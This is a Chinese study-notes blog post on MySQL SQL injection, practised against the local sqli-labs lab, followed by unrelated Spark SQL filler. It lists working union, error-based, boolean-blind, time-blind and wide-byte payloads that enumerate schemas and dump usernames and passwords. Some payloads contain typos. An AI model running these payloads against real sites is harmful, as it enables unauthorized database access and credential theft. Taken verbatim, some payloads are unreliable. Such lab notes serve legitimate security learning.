sql注入学习笔记:

一、Mysql基础知识

1、注释

单行注释 #

多行注释 /* */

单行注释 --空格  一般用-- +

内联注释 /*!5001*/   注释掉的内容只有高版本的mysql才会执行

2、语句

语句/函数

解释/功能

示例

union

用来拼接两个select语句,每个查询必须拥有相同列数,结果等于等一个select语句中的列名,默认选取不同值,允许重复值用union all

select name from pte union select age from pte;

order by x

根据第x列排序,默认升序

select * from pte order by 2;

limit x,y

从第x行开始显示y行

select * from pte limit 1,2;

user()

返回当前用户名

select user();

database()

返回当前所用数据库名

select database();

current_user()

返回当前用户名(可用来查看权限)

select current_user();

version()

返回数据库版本

select version();

@@datadir

返回数据库路径

select @@datadir();

count()

统计行数

select count(*) from pte

length ()

统计字符数

select length(name) from pte limit 0,1;

group_concat()

将结果所有行连成字符串并以,间隔

select group_concat(name) from pte

substr(……x,y)

从x位开始截取y位

select substr(name,1,1) from pte limit 0,1;

ascii()

返回指定字符串最左侧字符的ascii值

select ascii(name) from pte limit 0,1;

sleep(x)

将程序暂停x秒

select sleep(5);

if(x,y,z)

x成立执行y,x不成立执行z

select if((select age from pte limit1,1)>0,sleep(5),database())

二、SQL注入

1、基本原理:数据库将要查询的内容当成代码执行

2、基于联合查询

联合查询union的步骤:

  1. 判断网站是否存在注入,如果是纯静态(如何判断一个网站是不是伪静态 :在控制台console中输入alert(document.lastModified);查看到的时间为当前时间的话, 那么它很有可能是伪静态的, 如果看到的日期是以前的,那么它很可能就是静态页面了。)的就无法注入了
  2. 判断网站的闭合字符‘|“|’),使用and条件判断、页面报错信息、能否执行某个函数。
  3. 判断列数,判断前边表的列数,因为union是拼接后面sql语句想要查询的语句,使用order by函数判断列数。
  4. 判断输入的语句在页面哪里显示→判断显示位
  5. 查询数据库的版本,因为后面需要用到information,使用(select version())查询版本。
  6. 查询数据库名,使用database()查询当前网站数据库名。
  7. 查询当前数据库下所有表名,(因为不知道哪个表有被用到,所以查表名)(information_schema)
  8. 查当前网站数据库下指定表中的所有列
  9. 查当前网站数据库下指定表内指定列的字段内容

一.判断是否存在注入

二,求列数

http://127.0.0.1/sqli/sqli-labs-master/Less-1/?id=1%27%20order%20by%204%23

二分法

三、求显示位

实际为报错位

四、爆数据库版本号

id=-1' union select 1,2,version() -- +

五、爆当前数据库名

id=-1' union select 1,2,database() --+

查询所有数据库 id=-1‘ union select 1,2,group_concat(schema_name) from information_schema.schemata -- +

六、爆表名

id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'-- +

七、爆列名

id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' -- +

八、爆字段名

id=-1'union select 1,username,password from users where id=2 --+

2、布尔型盲注

特点:页面存在异常不反回保存信息

推测正确时,页面显示正常,不正确时,页面显示异常

步骤:

(1)求闭合字符

(2)求当前数据库名长度

(3)求当前数据库名对应的ascii值

(4)求表的数量

(5)求表名的长度

(6)求表名对应的ascii值

(7)求列的数量

(8)求列名的长度

(9)求列名对应的ASCII值

(10)求字段的数量

(11)求字段内容的长度

(12)求字段内容对应的ascii值 

 布尔型盲注实例:

(1)求闭合字符

(2)求当前数据库名的长度

(3)按位求数据库名的ascii码

(4)求表的数量

(5)求表名的长度

(6)求表名对应的ascii值

(7)求列的数量

(8)求列的长度

(9)求列名对应的ascii值

(10)求字段的数量

(11)求字段内容的长度

(12)求字段对应ascii值

3、基于报错信息的注入

(1)两个相关函数

extractvalue函数:

用于在数据库中取值,语法:extractvalue (XML_document, XPath_string)

updatexml函数:

用于更新文档中符合条件的节点的值,语法:updatexml(XML_document, XPath_string, new_value)

(2)原理:

将两个函数的XPath_string部分故意构造错误,在报错信息中即可得到想要查询的信息。

XPath_string部分中~和\是无法识别的,对应的十六进制分别是0x7c和0x5c,利用这个错误构造报错。 利用concat将~与语句连接成字符串。

and extractvalue(1,concat(0x7e,database()))

and updatexml(1,concat(0x7e,databse()),1) 

基于报错的模式:页面有报错信息时→输入敏感字符后页面有报错信息

基于报错的一般步骤:

库-表-列-字段

 和前面的不同之处:判断出是否存在字符以后用and进行连接

求库名:?id=1’and updatexml(1,concat(0x23,database()),1) --+

求表名:?id=1’and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema=’security’)),1) --+

求列名:?id=1’and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema=’security’and table_name=’user’)),1) --+

求字段内容:?id=1’and updatexml(1,concat(0x23,( select group_concat(username,0x23,password)fromsecurity.users)),1) --+

4、时间型盲注

特点:

页面不存在异常,无回显,无报错信息

原理:

利用条件语句,结合执行时间长短判断

if(布尔型语句,sleep(5),1)

当布尔型语句正确时,程序会暂停5秒,以此来判断行数或ascii码值。

5、宽字节注入

条件:数据库采用GBK字符集

原理:网站将特殊字符转译为反斜杠加特殊字符:addslashes或magic_quotes_gpc函数会将 单引号’ 双引号”  反斜杠\ 空字符null 等字符加上反斜线\。利用GBK编码,使反斜杠组成汉字即可屏蔽掉反斜杠\的作用,在GBK编码中反斜杠\对应的十六进制编码是5c, 在高位加入十六进制编码与5c组成汉字即可。可以加入df,十六进制df在URL编码中是%df,故加入%df,在数据库中会组成df5c,GBK编码中对应運,吃掉了反斜杠\。

注入步骤:在将\组合成汉字之后即可使用布尔或联合查询注入的方式进行注入。

附:

事件型注入和布尔型注入:

(1)区别时间型盲注和布尔型盲注的区别:时间型盲注 :页面没有明显的报错信息,也没有正确错误的回显状态,只能通过页面刷新来判断语句能否执行 ;布尔型盲注 根据页面的正确错误状态进行判断(时间型就是只能根据页面浏览器执行语句刷新的长短来去判断,布尔是可以根据 布尔型盲注 根据页面的正确错误状态进行判断)

(2)不同的注入语句:

时间型盲注
1.求数据库名长度
and if(length(database())=8,sleep(5),1) -- -
2.求数据库名对应的ASCII值
and if(ascii(substr((select database()),1,1))=115,sleep(5),1) -- -
3.求表的数量
and if((select count(*) from information_schema.tables where table_schema='security')=4,sleep(5),1)-- -
4.求表名的长度
and if((select length(table_name) from information_schema.tables where table_shcema='secuity' limit 0,1)=6,sleep(5),1) -- -
5.求表名对应的ASCII值
and if(ascii(substr((select(table_name)from information_schema,tables where table_schema='security' limit 0,1),1,1))=101,sleep(5),1)-- -
6.求列的数量
and if((select count(column_name)from information_schema.columns where table_schema='security' and table_name='users')=3,sleep(5),1)-- -
7.

布尔型盲注
1.求闭合字符
2.求数据库名长度
and length(database())=8 %23
3.求当前数据库名对应的ASCII值
and ascii(substr(database(),1,1))=115 %23
4.求表的数量
and (select count(table_name) from information_schema.tables where table_schema='security')=4 
%23
5.求表名的长度
and (select length(table_name) from information_schema.tables where table_schema='security' limit 0,1)=6 %23
6.求表名对应的ASCII值
and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 %23
7.求列的数量
and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3 %23
8.求列名的长度
and (select length(column_name) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)<3 %23
9.求列名对应的ASCII值
and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105 %23
10.求字段的数量
and (select count(username) from security.users)=13 %23
11.求字段内容的长度
and (select length(username) from security.users limit 0,1)=4 %23
12.求字段对应的ASCII值
and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68 %23

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
### 回答1: Spark SQL是Apache Spark中的一个模块,它提供了一种基于结构化数据的编程接口。Spark SQL可以让用户使用SQL语句来查询数据,也可以让用户使用DataFrame API来进行数据处理和分析。Spark SQL支持多种数据源,包括Hive、JSON、Parquet等。Spark SQL还提供了一些高级功能,如支持用户自定义函数、支持分布式机器学习算法等。Spark SQL的目标是让用户能够方便地使用Spark进行数据处理和分析,同时提供高性能和可扩展性。 ### 回答2: Spark SQL是一个基于Spark平台的关系型数据处理引擎,它支持使用SQL语句和数据框架操作数据,可以轻松处理结构化和半结构化的数据。它可以从多个数据源中读取数据,包括Hive、JSON、Parquet、ORC等。通过Spark SQL,用户可以方便地使用SQL查询语言来分析和处理数据,大大降低了开发和组织数据流的难度。 Spark SQL主要有两种执行模式:SQL查询和DataFrame操作。其中SQL查询基于Hive的SQL语法解析器,支持HiveQL中的大多数语言特性(如UDF、窗口函数等)。在执行计划生成时,Spark SQL采用了Spark的计算引擎,支持各种Spark算子的优化,以便最大程度地提高查询性能。 另一种操作模式是使用DataFrame API,它可以灵活地进行数据转换和处理,并提供了类似于SQL的语法。与SQL查询不同,DataFrame API通过静态检查和编译器优化来避免由SQL查询引起的语法错误和潜在性能问题。 除了这两种基本的操作模式外,Spark SQL还提供了一些高级特性,如嵌套查询、表和视图、共享变量等。这些特性扩展了Spark SQL的功能,使得它可以更加灵活地进行数据处理和查询。 Spark SQL是Spark的重要组成部分,它在数据存储和处理方面提供了很多便利。通过最大程度地利用Spark引擎的优势,Spark SQL能够处理海量数据,并将其转换为有用的信息。这使得Spark SQL成为实现数据分析、机器学习和人工智能的重要工具之一。 ### 回答3: Spark SQL是一种基于Spark平台的数据处理引擎,它提供了高度优化的查询引擎和优秀的支持SQL语句的API。它允许用户使用SQL语句查询来处理大规模数据集,同时仍然支持复杂数据类型和计算。Spark SQL支持数据源,包括Parquet,Avro,JSON等一系列结构化的和半结构化的数据源。 Spark SQL在历史上是一个单独的模块,在Spark 2.0之后,它已经成为Spark的核心组件之一,可以直接在Spark核心API中使用,包括作为一个RDD库或DataFrame/DataSet的API。 Spark SQL的优点如下: 1. 它可以向受过传统SQL培训的用户展示更高级别,更强大的API。 2. 它提供数据集和RDD的良好互操作性。Spark SQL可以通过未被优化的RDD/DataSet API访问同一数据。 3. 它支持Spark的执行引擎以加速查询处理。 使用Spark SQL的时候,可以根据需要选择编程语言,如Scala,Java,Python,SQL等。在Spark核心API中,Spark SQL提供了两种API来处理结构化数据: 1. DataFrame API:DataFrame是具有许多操纵数据的功能的分布式数据集,类似于数据库中的表。 2. Dataset API:Dataset是Scala和Java API,它是类型安全的,并且提供与RDD API相同的API,但比RDD具有更好的性能和可读性。 Spark SQL是Spark生态系统中重要的组成部分之一。在处理大规模数据时,使用Spark SQL可以方便地利用Spark的强大功能,提高处理效率。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值